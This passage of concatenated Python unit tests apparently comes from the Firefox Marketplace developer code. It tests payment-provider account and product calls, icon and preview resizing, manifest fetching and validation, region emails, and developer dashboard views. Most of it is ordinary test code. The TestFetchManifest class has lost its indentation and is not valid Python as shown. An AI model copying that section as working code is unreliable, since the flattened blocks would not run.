            u'<script>foo</script><a>bar</a>')

    def test_terms_update(self):
        seller_mock = Mock()
        seller_mock.get.return_value = {
            'id': 1,
            'resource_uri': '/a/b/c',
            'resource_name': 'x',
            'initial_field': u'initial content',
        }
        seller_mock.put.return_value = {}
        self.ref_patcher.sellers.return_value = seller_mock
        account = self.make_account()
        self.ref.terms_update(account)
        eq_(account.reload().agreed_tos, True)
        assert self.ref_patcher.sellers.called
        seller_mock.get.assert_called_with()
        # PUT keeps existing writable fields, stamps today's agreement
        # date, and drops the read-only id/resource_* keys.
        seller_mock.put.assert_called_with({
            'agreement': datetime.now().strftime('%Y-%m-%d'),
            'initial_field': u'initial content',
        })

    def test_account_retrieve(self):
        account = self.make_account()
        acc = self.ref.account_retrieve(account)
        eq_(acc, {'account_name': 'account name'})
        assert self.ref_patcher.sellers.called

    def test_account_update(self):
        account_data = {
            'status': '',
            'resource_name': 'sellers',
            'uuid': 'custom-uuid',
            'agreement': '',
            'email': '[email protected]',
            'id': 'custom-uuid',
            'resource_uri': '/provider/reference/sellers/custom-uuid/',
            'account_name': u'Test',
            'name': 'Test',
        }
        seller_mock = Mock()
        seller_mock.get.return_value = account_data
        self.ref_patcher.sellers.return_value = seller_mock
        account = self.make_account()
        self.ref.account_update(account, account_data)
        # uuid must be rendered as a hidden field on the account form.
        eq_(self.ref.forms['account']().hidden_fields()[0].name, 'uuid')
        eq_(account.reload().name, 'Test')
        seller_mock.put.assert_called_with(account_data)

    def test_product_create_exists(self):
        self.ref_patcher.products.get.return_value = [{'resource_uri': '/f'}]
        account = self.make_account()
        app = app_factory()
        self.ref.product_create(account, app)
        # Product should have been got from zippy, but not created by a post.
        assert self.ref_patcher.products.get.called

    @raises(ValueError)
    def test_product_mulitple(self):
        # More than one existing product for the app is ambiguous -> error.
        self.ref_patcher.products.get.return_value = [{}, {}]
        account = self.make_account()
        app = app_factory()
        self.ref.product_create(account, app)

    def test_product_create_not(self):
        # No existing product: one is created via POST with the external
        # id taken from the generic solitude product.
        self.generic_patcher.product.get_object_or_404.return_value = {
            'external_id': 'ext'}
        self.ref_patcher.products.get.return_value = []
        self.ref_patcher.products.post.return_value = {'resource_uri': '/f'}
        account = self.make_account()
        app = app_factory()
        self.ref.product_create(account, app)
        self.ref_patcher.products.get.assert_called_with(
            seller_id='1', external_id='ext')
        self.ref_patcher.products.post.assert_called_with(data={
            'seller_id': '1',
            'external_id': 'ext',
            'name': unicode(app.name),
            'uuid': ANY,
        })
class TestBoku(Patcher, TestCase):
    """Tests for the Boku payment provider wrapper."""
    fixtures = fixture('user_999')

    def setUp(self, *args, **kw):
        super(TestBoku, self).setUp(*args, **kw)
        self.user = UserProfile.objects.get(pk=999)
        self.boku = Boku()

    def make_account(self):
        # Helper: a Boku-provider PaymentAccount with its own seller.
        seller = SolitudeSeller.objects.create(user=self.user)
        return PaymentAccount.objects.create(user=self.user,
                                             solitude_seller=seller,
                                             uri='/f/b/1',
                                             name='account name',
                                             provider=PROVIDER_BOKU)

    def test_account_create(self):
        data = {'account_name': 'account',
                'service_id': 'b'}
        res = self.boku.account_create(self.user, data)
        acct = PaymentAccount.objects.get(user=self.user)
        eq_(acct.provider, PROVIDER_BOKU)
        # Boku accounts are marked as agreed on creation.
        eq_(acct.agreed_tos, True)
        eq_(res.pk, acct.pk)
        self.boku_patcher.seller.post.assert_called_with(data={
            'seller': ANY,
            'service_id': 'b',
        })

    def test_terms_update(self):
        account = self.make_account()
        assert not account.agreed_tos
        response = self.boku.terms_update(account)
        assert account.agreed_tos
        assert response['accepted']

    def test_create_new_product(self):
        # No Boku product yet (total_count 0): one is POSTed.
        account = self.make_account()
        app = app_factory()
        generic_product_uri = '/generic/product/1/'
        boku_product_uri = '/boku/product/1/'
        self.generic_patcher.product.get_object_or_404.return_value = {
            'resource_pk': 1,
            'resource_uri': generic_product_uri,
        }
        self.boku_patcher.product.get.return_value = {
            'meta': {'total_count': 0},
            'objects': [],
        }
        self.boku_patcher.product.post.return_value = {
            'resource_uri': boku_product_uri,
            'seller_product': generic_product_uri,
            'seller_boku': account.uri,
        }
        product = self.boku.product_create(account, app)
        eq_(product, boku_product_uri)
        self.boku_patcher.product.post.assert_called_with(data={
            'seller_boku': account.uri,
            'seller_product': generic_product_uri,
        })

    def test_update_existing_product(self):
        # Exactly one existing product: it is PATCHed in place via its uri.
        account = self.make_account()
        app = app_factory()
        generic_product_uri = '/generic/product/1/'
        self.generic_patcher.product.get_object_or_404.return_value = {
            'resource_pk': 1,
            'resource_uri': generic_product_uri,
        }
        existing_boku_product_uri = '/boku/product/1/'
        self.boku_patcher.product.get.return_value = {
            'meta': {'total_count': 1},
            'objects': [{
                'resource_uri': existing_boku_product_uri,
            }],
        }
        patch_mock = Mock()
        patch_mock.patch.return_value = {
            'resource_uri': existing_boku_product_uri,
            'seller_product': generic_product_uri,
            'seller_boku': account.uri,
        }
        self.boku_patcher.by_url.return_value = patch_mock
        product = self.boku.product_create(account, app)
        eq_(product, existing_boku_product_uri)
        self.boku_patcher.by_url.assert_called_with(existing_boku_product_uri)
        patch_mock.patch.assert_called_with(data={
            'seller_boku': account.uri,
            'seller_product': generic_product_uri,
        })

    def test_multiple_existing_products_raises_exception(self):
        # More than one existing product is ambiguous -> ValueError.
        account = self.make_account()
        app = app_factory()
        generic_product_uri = '/generic/product/1/'
        self.generic_patcher.product.get_object_or_404.return_value = {
            'resource_pk': 1,
            'resource_uri': generic_product_uri,
        }
        self.boku_patcher.product.get.return_value = {
            'meta': {'total_count': 2},
            'objects': [],
        }
        with self.assertRaises(ValueError):
            self.boku.product_create(account, app)
########NEW FILE########
__FILENAME__ = test_tasks
import codecs
import json
import os
import shutil
import socket
import tempfile
import urllib2
from cStringIO import StringIO
from contextlib import contextmanager
from django.conf import settings
from django.core import mail
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
import mock
from nose.tools import eq_
from PIL import Image, ImageChops
from requests import RequestException
import amo
import amo.tests
import mkt
from addons.models import Preview
from amo.tests.test_helpers import get_image_path
from amo.utils import ImageCheck
from files.models import FileUpload
from mkt.developers import tasks
from mkt.site.fixtures import fixture
from mkt.submit.tests.test_views import BaseWebAppTest
from mkt.webapps.models import AddonExcludedRegion as AER, Webapp
def test_resize_icon_shrink():
    """ Image should be shrunk so that the longest side is 32px. """
    _uploader([32], [(32, 12)])
def test_resize_icon_enlarge():
    """ Image stays the same, since the new size is bigger than both sides. """
    _uploader([1000], [(339, 128)])
def test_resize_icon_same():
    """ Image stays the same, since the new size is the same. """
    _uploader([339], [(339, 128)])
def test_resize_icon_list():
    """ Resize multiple images at once. """
    _uploader([32, 82, 100],
              [(32, 12), (82, 30), (100, 37)])
def _uploader(resize_size, final_size):
    """Run tasks.resize_icon over a copy of mozilla.png and verify output.

    resize_size -- list of target sizes handed to resize_icon.
    final_size -- list of (width, height) tuples expected per target size.
    """
    img = get_image_path('mozilla.png')
    original_size = (339, 128)
    for rsize, fsize in zip(resize_size, final_size):
        dest_name = os.path.join(settings.ADDON_ICONS_PATH, '1234')
        src = tempfile.NamedTemporaryFile(mode='r+w+b', suffix='.png',
                                          delete=False)
        # resize_icon removes the original, copy it to a tempfile and use that.
        shutil.copyfile(img, src.name)
        # Sanity check.
        with storage.open(src.name) as fp:
            src_image = Image.open(fp)
            src_image.load()
            eq_(src_image.size, original_size)
        val = tasks.resize_icon(src.name, dest_name, resize_size, locally=True)
        eq_(val, {'icon_hash': 'bb362450'})
        with storage.open('%s-%s.png' % (dest_name, rsize)) as fp:
            dest_image = Image.open(fp)
            dest_image.load()
        # Assert that the width is always identical.
        eq_(dest_image.size[0], fsize[0])
        # Assert that the height can be a wee bit fuzzy.
        # BUG FIX: the failure message used to say "width" and had the
        # got/expected values swapped.
        assert -1 <= dest_image.size[1] - fsize[1] <= 1, (
            'Got height %d, expected %d' %
            (dest_image.size[1], fsize[1]))
        # Clean up the generated icon and ensure the source was consumed.
        if os.path.exists(dest_image.filename):
            os.remove(dest_image.filename)
        assert not os.path.exists(dest_image.filename)
        assert not os.path.exists(src.name)
class TestPngcrushImage(amo.tests.TestCase):
    """Tests for tasks.pngcrush_image (lossless PNG optimization)."""

    def setUp(self):
        # Work on a throwaway copy so the fixture image is never modified.
        img = get_image_path('mozilla.png')
        self.src = tempfile.NamedTemporaryFile(mode='r+w+b', suffix=".png",
                                               delete=False)
        shutil.copyfile(img, self.src.name)

    def tearDown(self):
        os.remove(self.src.name)

    def test_pngcrush_image_is_optimized(self):
        src_crushed = tempfile.NamedTemporaryFile(mode='r+w+b', suffix=".png",
                                                  delete=False)
        shutil.copyfile(self.src.name, src_crushed.name)
        rval = tasks.pngcrush_image(src_crushed.name)
        eq_(rval, True)
        # The crushed file must be strictly smaller...
        crushed_size = os.path.getsize(src_crushed.name)
        orig_size = os.path.getsize(self.src.name)
        assert crushed_size < orig_size
        # ...while staying pixel-for-pixel identical (lossless).
        orig_image = Image.open(self.src.name)
        crushed_image = Image.open(src_crushed.name)
        eq_(ImageChops.difference(crushed_image, orig_image).getbbox(), None)
        os.remove(src_crushed.name)
class TestValidator(amo.tests.TestCase):
    """Tests for the mkt.developers.tasks.validator task."""

    def setUp(self):
        self.upload = FileUpload.objects.create()
        assert not self.upload.valid

    def get_upload(self):
        # Re-fetch so we observe the state the task committed to the DB.
        return FileUpload.objects.get(pk=self.upload.pk)

    @mock.patch('mkt.developers.tasks.run_validator')
    def test_pass_validation(self, _mock):
        _mock.return_value = '{"errors": 0}'
        tasks.validator(self.upload.pk)
        assert self.get_upload().valid

    @mock.patch('mkt.developers.tasks.run_validator')
    def test_fail_validation(self, _mock):
        _mock.return_value = '{"errors": 2}'
        tasks.validator(self.upload.pk)
        assert not self.get_upload().valid

    @mock.patch('mkt.developers.tasks.run_validator')
    def test_validation_error(self, _mock):
        # A crashing validator re-raises and records the traceback on the
        # upload's task_error field.
        _mock.side_effect = Exception
        eq_(self.upload.task_error, None)
        with self.assertRaises(Exception):
            tasks.validator(self.upload.pk)
        error = self.get_upload().task_error
        assert error is not None
        assert error.startswith('Traceback (most recent call last)'), error

    @mock.patch('mkt.developers.tasks.validate_app')
    @mock.patch('mkt.developers.tasks.storage.open')
    def test_validate_manifest(self, _open, _mock):
        # A non-zip webapp upload goes through the manifest validator.
        self.get_upload().update(is_webapp=True)
        _open.return_value = StringIO('')
        _mock.return_value = '{"errors": 0}'
        tasks.validator(self.upload.pk)
        assert _mock.called

    @mock.patch('mkt.developers.tasks.validate_packaged_app')
    @mock.patch('zipfile.is_zipfile')
    def test_validate_packaged_app(self, _zipfile, _mock):
        # A zip upload goes through the packaged-app validator.
        self.get_upload().update(is_webapp=True)
        _zipfile.return_value = True
        _mock.return_value = '{"errors": 0}'
        tasks.validator(self.upload.pk)
        assert _mock.called
# Keep a reference to the real implementation so the mock can delegate.
storage_open = storage.open


def _mock_hide_64px_icon(path, *args, **kwargs):
    """
    Stand-in for `storage.open` that refuses to open 128x128px icons
    (raising IOError) and delegates every other path to the real function.
    """
    if '128' not in path:
        return storage_open(path, *args, **kwargs)
    raise IOError('No 128px icon for you!')
@override_settings(
    PREVIEW_FULL_PATH='/tmp/uploads-tests/previews/full/%s/%d.%s',
    PREVIEW_THUMBNAIL_PATH='/tmp/uploads-tests/previews/thumbs/%s/%d.png')
class TestResizePreview(amo.tests.TestCase):
    """Tests for tasks.resize_preview (full image + thumbnail sizes)."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        # Make sure there are no leftover files in the test directory before
        # launching tests that depend on the files presence/absence.
        shutil.rmtree('/tmp/uploads-tests/previews/', ignore_errors=True)

    def test_preview(self):
        # Portrait source: sizes recorded and files written at both sizes.
        addon = Webapp.objects.get(pk=337141)
        preview = Preview.objects.create(addon=addon)
        src = get_image_path('preview.jpg')
        tasks.resize_preview(src, preview)
        preview = preview.reload()
        eq_(preview.image_size, [400, 533])
        eq_(preview.thumbnail_size, [100, 133])
        eq_(preview.is_landscape, False)
        with storage.open(preview.thumbnail_path) as fp:
            im = Image.open(fp)
            eq_(list(im.size), [100, 133])
        with storage.open(preview.image_path) as fp:
            im = Image.open(fp)
            eq_(list(im.size), [400, 533])

    def test_preview_rotated(self):
        # Landscape source: dimensions transposed, is_landscape flagged.
        addon = Webapp.objects.get(pk=337141)
        preview = Preview.objects.create(addon=addon)
        src = get_image_path('preview_landscape.jpg')
        tasks.resize_preview(src, preview)
        preview = preview.reload()
        eq_(preview.image_size, [533, 400])
        eq_(preview.thumbnail_size, [133, 100])
        eq_(preview.is_landscape, True)
        with storage.open(preview.thumbnail_path) as fp:
            im = Image.open(fp)
            eq_(list(im.size), [133, 100])
        with storage.open(preview.image_path) as fp:
            im = Image.open(fp)
            eq_(list(im.size), [533, 400])

    def test_preview_dont_generate_image(self):
        # generate_image=False: only the thumbnail is produced.
        addon = Webapp.objects.get(pk=337141)
        preview = Preview.objects.create(addon=addon)
        src = get_image_path('preview.jpg')
        tasks.resize_preview(src, preview, generate_image=False)
        preview = preview.reload()
        eq_(preview.image_size, [])
        eq_(preview.thumbnail_size, [100, 133])
        eq_(preview.sizes, {u'thumbnail': [100, 133]})
        with storage.open(preview.thumbnail_path) as fp:
            im = Image.open(fp)
            eq_(list(im.size), [100, 133])
        assert not os.path.exists(preview.image_path), preview.image_path
class TestFetchManifest(amo.tests.TestCase):
def setUp(self):
self.upload = FileUpload.objects.create()
self.content_type = 'application/x-web-app-manifest+json'
patcher = mock.patch('mkt.developers.tasks.requests.get')
self.requests_mock = patcher.start()
self.addCleanup(patcher.stop)
def get_upload(self):
return FileUpload.objects.get(pk=self.upload.pk)
def file(self, name):
return os.path.join(os.path.dirname(__file__), 'addons', name)
@contextmanager
def patch_requests(self):
response_mock = mock.Mock(status_code=200)
response_mock.iter_content.return_value = mock.Mock(
next=lambda: '<default>')
response_mock.headers = {'content-type': self.content_type}
yield response_mock
self.requests_mock.return_value = response_mock
@mock.patch('mkt.developers.tasks.validator')
def test_success_add_file(self, validator_mock):
with self.patch_requests() as ur:
ur.iter_content.return_value = mock.Mock(next=lambda: 'woo')
tasks.fetch_manifest('http://xx.com/manifest.json', self.upload.pk)
upload = FileUpload.objects.get(pk=self.upload.pk)
eq_(upload.name, 'http://xx.com/manifest.json')
eq_(upload.is_webapp, True)
eq_(storage.open(upload.path).read(), 'woo')
@mock.patch('mkt.developers.tasks.validator')
def test_success_call_validator(self, validator_mock):
with self.patch_requests() as ur:
ct = self.content_type + '; charset=utf-8'
ur.headers = {'content-type': ct}
tasks.fetch_manifest('http://xx.com/manifest.json', self.upload.pk)
assert validator_mock.called
def check_validation(self, msg=''):
upload = self.get_upload()
if msg:
validation = json.loads(upload.validation)
eq_([m['message'] for m in validation['messages']], [msg])
eq_(validation['errors'], 1)
eq_(validation['success'], False)
eq_(len(validation['messages']), 1)
else:
validation_output = upload.validation
if not validation_output:
return
validation = json.loads(validation_output)
assert not validation['messages']
eq_(validation['errors'], 0)
eq_(validation['success'], True)
def test_connection_error(self):
reason = socket.gaierror(8, 'nodename nor servname provided')
self.requests_mock.side_effect = RequestException(reason)
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'No manifest was found at that URL. Check the address and try '
'again.')
def test_url_timeout(self):
reason = socket.timeout('too slow')
self.requests_mock.side_effect = RequestException(reason)
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'No manifest was found at that URL. Check the address and try '
'again.')
def test_other_url_error(self):
reason = Exception('Some other failure.')
self.requests_mock.side_effect = RequestException(reason)
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'No manifest was found at that URL. Check the address and try '
'again.')
@mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
def test_no_content_type(self):
with self.patch_requests() as ur:
ur.headers = {}
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'No manifest was found at that URL. Check the address and try '
'again.')
@mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
def test_bad_content_type(self):
with self.patch_requests() as ur:
ur.headers = {'Content-Type': 'x'}
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'Manifests must be served with the HTTP header "Content-Type: '
'application/x-web-app-manifest+json". See %s for more '
'information.' % tasks.CT_URL)
@mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
def test_good_charset(self):
with self.patch_requests() as ur:
ur.headers = {
'content-type': 'application/x-web-app-manifest+json;'
'charset=utf-8'
}
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation()
    @mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
    def test_bad_charset(self):
        """A charset that doesn't match the body's encoding is rejected."""
        with self.patch_requests() as ur:
            ur.headers = {
                'content-type': 'application/x-web-app-manifest+json;'
                                'charset=ISO-1234567890-LOL'
            }
        tasks.fetch_manifest('url', self.upload.pk)
        self.check_validation("The manifest's encoding does not match the "
                              'charset provided in the HTTP Content-Type.')
    def test_response_too_large(self):
        """A manifest body over MAX_WEBAPP_UPLOAD_SIZE fails with a size error."""
        with self.patch_requests() as ur:
            # One byte over the limit.
            content = 'x' * (settings.MAX_WEBAPP_UPLOAD_SIZE + 1)
            ur.iter_content.return_value = mock.Mock(next=lambda: content)
        tasks.fetch_manifest('url', self.upload.pk)
        max_webapp_size = settings.MAX_WEBAPP_UPLOAD_SIZE
        self.check_validation('Your manifest must be less than %s bytes.' %
                              max_webapp_size)
    def test_http_error(self):
        """An HTTP 404 maps to the generic 'no manifest' error."""
        self.requests_mock.side_effect = urllib2.HTTPError(
            'url', 404, 'Not Found', [], None)
        tasks.fetch_manifest('url', self.upload.pk)
        self.check_validation(
            'No manifest was found at that URL. Check the address and try '
            'again.')
    def test_strip_utf8_bom(self):
        """A UTF-8 BOM at the start of the manifest is stripped before saving."""
        with self.patch_requests() as ur:
            with open(self.file('utf8bom.webapp')) as fp:
                content = fp.read()
            ur.iter_content.return_value = mock.Mock(next=lambda: content)
        tasks.fetch_manifest('url', self.upload.pk)
        # Should not be called with anything else (e.g., `decode_unicode`).
        ur.iter_content.assert_called_with(
            chunk_size=settings.MAX_WEBAPP_UPLOAD_SIZE + 1)
        upload = self.get_upload()
        with storage.open(upload.path, 'rb') as fp:
            manifest = fp.read()
        json.loads(manifest)  # No parse error.
        assert not manifest.startswith(codecs.BOM_UTF8)
    def test_non_utf8_encoding(self):
        """A manifest not encoded as UTF-8 is rejected with an encoding error."""
        with self.patch_requests() as ur:
            with open(self.file('utf8bom.webapp')) as fp:
                # Set encoding to utf16 which will be invalid.
                content = fp.read().decode('utf8').encode('utf16')
            ur.iter_content.return_value = mock.Mock(next=lambda: content)
        tasks.fetch_manifest('url', self.upload.pk)
        self.check_validation(
            'Your manifest file was not encoded as valid UTF-8.')
class TestFetchIcon(BaseWebAppTest):
    """Tests for the fetch_icon task: downloading and resizing the icons
    referenced by an app's manifest."""

    def setUp(self):
        super(TestFetchIcon, self).setUp()
        self.content_type = 'image/png'
        self.apps_path = os.path.join(settings.ROOT, 'mkt', 'developers',
                                      'tests', 'addons')
        # Stub out network access: any URL "downloads" the string below.
        patcher = mock.patch('mkt.developers.tasks.requests.get')
        self.requests_mock = patcher.start()
        self.requests_mock.return_value = StringIO('mozballin')
        self.addCleanup(patcher.stop)

    def webapp_from_path(self, path):
        """Run the given manifest through the submission flow; return the app."""
        self.upload = self.get_upload(abspath=path)
        self.url = reverse('submit.app')
        assert self.client.login(username='[email protected]',
                                 password='password')
        return self.post_addon()

    def test_no_version(self):
        # An app with no version has no manifest to read icons from.
        app = Webapp()
        eq_(tasks.fetch_icon(app), None)

    def test_no_icons(self):
        # Manifest without an icons section: nothing should be fetched.
        path = os.path.join(self.apps_path, 'noicon.webapp')
        iconless_app = self.webapp_from_path(path)
        tasks.fetch_icon(iconless_app)
        assert not self.requests_mock.called

    def test_bad_icons(self):
        # Malformed icons section: also no fetch attempted.
        path = os.path.join(self.apps_path, 'badicon.webapp')
        iconless_app = self.webapp_from_path(path)
        tasks.fetch_icon(iconless_app)
        assert not self.requests_mock.called

    def check_icons(self, webapp):
        """Assert a square PNG exists for each configured size up to the
        largest size declared in the manifest."""
        manifest = webapp.get_manifest_json()
        biggest = max([int(size) for size in manifest['icons']])
        icon_dir = webapp.get_icon_dir()
        for size in amo.ADDON_ICON_SIZES:
            if not size <= biggest:
                continue
            icon_path = os.path.join(icon_dir, '%s-%s.png'
                                     % (str(webapp.id), size))
            with open(icon_path, 'r') as img:
                checker = ImageCheck(img)
                assert checker.is_image()
                eq_(checker.img.size, (size, size))

    def test_data_uri(self):
        # Icons supplied inline as data: URIs are decoded and saved.
        app_path = os.path.join(self.apps_path, 'dataicon.webapp')
        webapp = self.webapp_from_path(app_path)
        tasks.fetch_icon(webapp)
        eq_(webapp.icon_type, self.content_type)
        self.check_icons(webapp)

    def test_hosted_icon(self):
        app_path = os.path.join(self.apps_path, 'mozball.webapp')
        webapp = self.webapp_from_path(app_path)
        img_path = os.path.join(self.apps_path, 'mozball-128.png')
        with open(img_path, 'r') as content:
            tasks.save_icon(webapp, content.read())
        eq_(webapp.icon_type, self.content_type)
        self.check_icons(webapp)

    @mock.patch('mkt.developers.tasks._fetch_content')
    @mock.patch('mkt.developers.tasks.save_icon')
    def test_cdn_icon(self, save, fetch):
        # Hosted (non-packaged) apps fetch the icon from its absolute URL.
        response = mock.Mock()
        response.read.return_value = ''
        webapp = mock.Mock()
        webapp.is_packaged = False
        url = 'http://foo.com/bar'
        webapp.get_manifest_json.return_value = {'icons': {'128': url}}
        tasks.fetch_icon(webapp)
        assert url in fetch.call_args[0][0]

    @mock.patch('mkt.developers.tasks.SafeUnzip')
    @mock.patch('mkt.developers.tasks.save_icon')
    def test_packaged_icon(self, save, zip):
        # Packaged apps extract the icon from inside the zip instead.
        response = mock.Mock()
        response.read.return_value = ''
        zf = mock.Mock()
        zip.return_value = zf
        webapp = mock.Mock()
        webapp.is_packaged = True
        url = '/path/to/icon.png'
        webapp.get_manifest_json.return_value = {'icons': {'128': url}}
        tasks.fetch_icon(webapp)
        # The leading slash is stripped before extraction from the package.
        assert url[1:] in zf.extract_path.call_args[0][0]
class TestRegionEmail(amo.tests.WebappTestCase):
    """Emails sent to developers when new Marketplace regions are added."""

    @mock.patch.object(settings, 'SITE_URL', 'http://omg.org/')
    def test_email_for_one_new_region(self):
        # One region: subject names the region directly.
        tasks.region_email([self.app.id], [mkt.regions.BR])
        msg = mail.outbox[0]
        eq_(msg.subject, '%s: Brazil region added to the Firefox Marketplace'
            % self.app.name)
        eq_(msg.to, ['[email protected]'])
        dev_url = ('http://omg.org/developers/app/something-something/'
                   'edit#details')
        assert unicode(self.app.name) in msg.body
        assert dev_url in msg.body
        assert ' added a new ' in msg.body
        assert ' for Brazil.' in msg.body
        # TODO: Re-enable this when we bring back Unsubscribe (bug 802379).
        #assert 'Unsubscribe' in msg.body

    @mock.patch.object(settings, 'SITE_URL', 'http://omg.org/')
    def test_email_for_two_new_regions(self):
        # Two regions: generic subject, "two new" wording in the body.
        tasks.region_email([self.app.id],
                           [mkt.regions.UK, mkt.regions.BR])
        msg = mail.outbox[0]
        eq_(msg.subject, '%s: New regions added to the Firefox Marketplace'
            % self.app.name)
        eq_(msg.to, ['[email protected]'])
        dev_url = ('http://omg.org/developers/app/something-something/'
                   'edit#details')
        assert unicode(self.app.name) in msg.body
        assert dev_url in msg.body
        assert ' added two new ' in msg.body
        assert ': Brazil and United Kingdom.' in msg.body
        # TODO: Re-enable this when we bring back Unsubscribe (bug 802379).
        #assert 'Unsubscribe' in msg.body

    @mock.patch.object(settings, 'SITE_URL', 'http://omg.org/')
    def test_email_for_several_new_regions(self):
        # Three or more regions: "a few new" wording, regions listed sorted.
        tasks.region_email([self.app.id],
                           [mkt.regions.UK, mkt.regions.US, mkt.regions.BR])
        msg = mail.outbox[0]
        eq_(msg.subject, '%s: New regions added to the Firefox Marketplace'
            % self.app.name)
        assert ' added a few new ' in msg.body
        assert ': Brazil, United Kingdom, and United States.' in msg.body
class TestRegionExclude(amo.tests.WebappTestCase):
    """Exercise the region_exclude task, which records region exclusions
    (AER rows) for the given apps."""

    def test_exclude_no_apps(self):
        # With no app ids there is nothing to exclude, regions or not.
        tasks.region_exclude([], [])
        eq_(AER.objects.count(), 0)
        tasks.region_exclude([], [mkt.regions.UK])
        eq_(AER.objects.count(), 0)

    def test_exclude_no_regions(self):
        # An empty region list creates no exclusions either.
        tasks.region_exclude([self.app.id], [])
        eq_(AER.objects.count(), 0)

    def test_exclude_one_new_region(self):
        tasks.region_exclude([self.app.id], [mkt.regions.UK])
        rows = AER.objects.filter(addon=self.app).values_list('region',
                                                              flat=True)
        eq_(list(rows), [mkt.regions.UK.id])

    def test_exclude_several_new_regions(self):
        tasks.region_exclude([self.app.id], [mkt.regions.US, mkt.regions.UK])
        rows = AER.objects.filter(addon=self.app).values_list('region',
                                                              flat=True)
        eq_(sorted(rows), sorted([mkt.regions.US.id, mkt.regions.UK.id]))
########NEW FILE########
__FILENAME__ = test_utils_
from django.core.files.storage import default_storage as storage
import amo.tests
from mkt.developers.utils import check_upload
class TestCheckUpload(amo.tests.TestCase, amo.tests.AMOPaths):
    """Tests for mkt.developers.utils.check_upload."""
    # TODO: increase coverage on check_upload.

    def test_not_valid(self):
        # An unsupported upload type must raise.
        with self.assertRaises(ValueError):
            check_upload([], 'graphic', 'image/jpg')

    def test_valid(self):
        # A real preview image validates with no errors.
        with storage.open(self.preview_image()) as f:
            errors, upload_hash = check_upload(f, 'preview', 'image/png')
        assert not errors
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import datetime
import json
import os
import tempfile
from contextlib import contextmanager
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from django.test.client import RequestFactory
from django.test.utils import override_settings
import mock
from nose.plugins.attrib import attr
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
import amo
import amo.tests
import mkt
from addons.models import Addon, AddonDeviceType, AddonUpsell, AddonUser
from amo.helpers import absolutify
from amo.tests import (app_factory, assert_no_validation_errors,
version_factory)
from amo.tests.test_helpers import get_image_path
from amo.utils import urlparams
from files.models import File, FileUpload
from lib.iarc.utils import get_iarc_app_title
from mkt.constants import MAX_PACKAGED_APP_SIZE
from mkt.developers import tasks
from mkt.developers.views import (_filter_transactions, _get_transactions,
_ratings_success_msg, _submission_msgs,
content_ratings, content_ratings_edit)
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
from mkt.site.fixtures import fixture
from mkt.submit.models import AppSubmissionChecklist
from mkt.webapps.models import ContentRating, Webapp
from mkt.prices.models import AddonPremium, Price
from stats.models import Contribution
from translations.models import Translation
from users.models import UserProfile
from versions.models import Version
class AppHubTest(amo.tests.TestCase):
    """Shared setup for developer-hub ("My Submissions") tests."""
    fixtures = fixture('prices', 'webapp_337141') + ['base/users']

    def setUp(self):
        self.create_flag('allow-b2g-paid-submission')
        self.url = reverse('mkt.developers.apps')
        self.user = UserProfile.objects.get(username='31337')
        assert self.client.login(username=self.user.email, password='password')

    def clone_addon(self, num, addon_id=337141):
        """Create `num` copies of the given add-on owned by self.user;
        return the new ids."""
        created = []
        for i in xrange(num):
            template = Addon.objects.get(id=addon_id)
            clone = Addon.objects.create(
                type=template.type, status=template.status,
                name='cloned-addon-%s-%s' % (addon_id, i))
            AddonUser.objects.create(user=self.user, addon=clone)
            created.append(clone.id)
        return created

    def get_app(self):
        return Addon.objects.get(id=337141)
class TestHome(amo.tests.TestCase):
    """The developer hub landing page for anonymous and logged-in users."""
    fixtures = ['base/users']

    def setUp(self):
        self.url = reverse('mkt.developers.apps')

    def test_login_redirect(self):
        response = self.client.get(self.url)
        self.assertLoginRedirects(response, '/developers/submissions', 302)

    def test_home_anonymous(self):
        # Anonymous users end up on the login template.
        response = self.client.get(self.url, follow=True)
        eq_(response.status_code, 200)
        self.assertTemplateUsed(response, 'developers/login.html')

    def test_home_authenticated(self):
        # Logged-in users see the dashboard.
        assert self.client.login(username='[email protected]',
                                 password='password')
        response = self.client.get(self.url, follow=True)
        eq_(response.status_code, 200)
        self.assertTemplateUsed(response, 'developers/apps/dashboard.html')
class TestAppBreadcrumbs(AppHubTest):
    """Breadcrumb trails on submission and app-management pages."""

    def setUp(self):
        super(TestAppBreadcrumbs, self).setUp()

    def test_regular_breadcrumbs(self):
        r = self.client.get(reverse('submit.app'), follow=True)
        eq_(r.status_code, 200)
        expected = [
            ('Home', reverse('home')),
            ('Developers', reverse('ecosystem.landing')),
            ('Submit App', None),
        ]
        amo.tests.check_links(expected, pq(r.content)('#breadcrumbs li'))

    def test_webapp_management_breadcrumbs(self):
        webapp = Webapp.objects.get(id=337141)
        # User must own the app to reach its edit page.
        AddonUser.objects.create(user=self.user, addon=webapp)
        r = self.client.get(webapp.get_dev_url('edit'))
        eq_(r.status_code, 200)
        expected = [
            ('Home', reverse('home')),
            ('Developers', reverse('ecosystem.landing')),
            ('My Submissions', reverse('mkt.developers.apps')),
            (unicode(webapp.name), None),
        ]
        amo.tests.check_links(expected, pq(r.content)('#breadcrumbs li'))
class TestAppDashboard(AppHubTest):
    """Developer dashboard listing: item rendering, statuses, action links."""

    def test_no_apps(self):
        Addon.objects.all().delete()
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        eq_(pq(r.content)('#dashboard .item').length, 0)

    def make_mine(self):
        # Make the fixture app belong to the logged-in user.
        AddonUser.objects.create(addon_id=337141, user=self.user)

    def test_public_app(self):
        app = self.get_app()
        self.make_mine()
        doc = pq(self.client.get(self.url).content)
        item = doc('.item[data-addonid=%s]' % app.id)
        assert item.find('.price'), 'Expected price'
        assert item.find('.item-details'), 'Expected item details'
